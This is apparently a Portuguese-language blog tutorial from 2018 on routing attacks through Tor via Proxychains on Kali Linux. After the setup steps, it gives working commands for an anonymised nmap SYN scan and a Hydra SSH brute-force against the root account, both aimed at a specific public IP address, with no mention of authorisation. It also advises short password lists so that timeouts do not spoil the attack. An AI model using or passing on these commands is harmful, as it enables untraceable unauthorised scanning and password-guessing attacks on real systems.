sexta-feira, 29 de junho de 2018

REALIZANDO ATAQUES E VARREDURAS COM TOR E PROXYCHAINS

E ae galera, hoje vamos entender e realizar ataques e varreduras com o Tor e Proxychains. 

O Proxychains é um pacote que permite fazer o roteamento das requisições das suas aplicações através de proxys escolhidos por você e colocado em uma lista. Mas nesse caso iremos fazer uma adaptação que vai unir o útil ao extremamente agradável. Ao invés do Proxychains realizar o roteamento para uma lista específica de proxys, iremos instalar o Tor Router e redirecionar as requisições diretamente para a porta do Tor. Ou seja, iremos realizar varreduras diretamente pela Tor.

Como ambiente escolhi utilizar o Kali Linux, mas caso você necessite utilizar em outra distribuição, basta instalar os pacotes:

Debian/Ubuntu:
# sudo apt-get install tor  
# sudo apt-get install proxychains 

CentOS/RHEL7
# sudo yum install tor  
# sudo yum install proxychains 

Instalando e configurando o Tor
root@kali:~#: sudo apt-get install tor
 
Agora vamos editar o arquivo de configurações do Proxychains nativo do Kali

root@kali:~#: nano /etc/proxychains.conf 

Comente a linha "strict_chain" e descomente a linha "dynamic_chain".

Ficando assim:



E agora no final deste mesmo arquivo, vamos adicionar:

socks5   127.0.0.1     9050

Ficando assim: 

  

Inicializando o serviço da Tor
root@kali:~#: service tor start
root@kali:~#: tor 

Veja se o serviço esta realmente rodando:

root@kali:~#: service tor status



Testando a conexão
Use comando:

root@kali:~#: proxychains firefox

e acesse meuip.com.br para ver seu IP de proxy.

Agora acesse o utrace e coloque o IP do seu Proxy para saber a localização do servidor que você está utilizando como Gateway em en.utrace.de




Agora você esta redirecionado para um gateway em outro lugar.

Agora quando for realizar alguma varredura é só executar o comando com o proxychains na frente

Realizando uma varredura via Proxychains
root@kali:~#: proxychains nmap -sC -sS 177.126.175.230

Para executar o reload no tor basta  
root@kali:~#: service tor restart
 
Verificando o gateway atual
root@kali:~#: curl ifconfig.me

No caso do NMAP, busque sempre varrer pelo IP, pois às vezes, dependendo da localização do seu proxy, a resolução dos nomes pode far timeout ou crashear o scan.

Realizando ataques de força bruta via Tor
Vamos executar um exemplo simples de ataque de brute force usando o Hydra e uma passlist

root@kali:~#: proxychains hydra -l root -P passlist.txt 177.126.175.230 ssh

No caso é recomendado o uso de passlists curtas para evitar que os erros de timeout comprometam o ataque.

Nenhum comentário:

Postar um comentário